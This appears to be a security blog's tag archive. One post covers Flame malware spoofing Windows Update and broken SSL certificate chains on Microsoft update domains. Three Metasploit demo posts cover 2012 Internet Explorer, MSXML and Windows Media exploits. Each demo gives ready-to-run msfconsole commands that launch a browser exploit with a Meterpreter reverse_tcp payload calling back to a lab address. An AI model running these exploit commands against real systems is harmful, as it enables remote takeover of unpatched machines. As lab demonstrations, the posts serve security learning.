Tag Archives: Windows

update.microsoft.com SSL warnings due to certificate chain update

Flame malware, buzz of June 2012, had an interesting replication methods through Microsoft Windows Update service. The SNACK (NBNS spoofing) and MUNCH (Spoofing proxy detection and Windows Update request) Flame modules have allow man in the middle (MITM) attacks allowing distribution of forged Windows updates to the targets.

The MITM URLs were :

download.windowsupdate.com
download.microsoft.com
update.microsoft.com
www.update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com
www.download.windowsupdate.com
v5stats.windowsupdate.microsoft.com

The problem was that components of Flame were signed using a forged certificate that the attacker were able to create by exploiting a weakness in Microsoft Terminal Services, how allow users to sign code with Microsoft certificates.

Microsoft has issue a security advisory (MSA-2718704) and an update (KB-2718704) how will remove the untrusted certificates.

But since today, “Microsoft Root Certificate Authority” root certificate, “Microsoft Update Secure Server CA 1” intermediate certificate are not more trusted by majority of Internet browsers like Firefox, Chrome, Safari and Opera. The cause is that Microsoft has regenerate the Windows Update certificate chain. The chain of trust is broken (Qualys SSL LabsSSL Shopper SSL Checker) for www.update.microsoft.com and update.microsoft.com.

SSL certificates for the following domain names are also no more trusted, cause the chain of trust is broken:

www.update.microsoft.com
update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com

The SSL certificates associated to the following domain names are also no more trusted, cause they are pointing to a host not corresponding to the requested domain name (hosted on Akamai):

download.windowsupdate.com
download.microsoft.com
www.download.windowsupdate.com

With KB-2718704 installed on an up2date Windows XP SP3, only “www.update.microsoft.com” domain could be considered as trusted, if you use Internet Explorer.

But despite the installation of KB-2718704, the following domains are still invalid:

update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com
download.windowsupdate.com
download.microsoft.com

Here under some screenshots of different browsers and error messages.

[nggallery id=5]

MS12-043 Microsoft XML Core Services Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-15

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

MSA-2719615
MS12-043
MS KB 2719615
CVE-2012-1889
OSVDB-82873

Affected version(s) :

Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0.

Tested on Windows XP Pro SP3 with :

Internet Explorer 6 (6.0.2900.5512.xpsp_sp3_gdr.11025-1629)

Description :

This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory allowing remote code execution. At the moment, this module only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3.

Commands :

use exploit/windows/browser/msxml_get_definition_code_exec
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-13

PoC provided by :

Dark Son
Qihoo 360 Security Center
Yichong Lin
Google Inc.
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1875
OSVDB-82865
https://twitter.com/binjo/status/212795802974830592

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited in the wild.

Commands :

use exploit/windows/browser/ms12_037_same_id
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

MS12-004 Windows Media Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability the 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided the 2012-01-27

PoC provided by :

Shane Garrett
juan vazquez
sinn3r

Reference(s) :

MS12-004
CVE-2012-0003
OSVDB-78210
Trend Micro Blog Post

Affected version(s) :

Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1

Tested on Windows XP SP3 with :

winmm.dll 5.1.2600.5512

Description :

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player’s ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Commands :

use exploit/windows/browser/ms12_004_midi
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid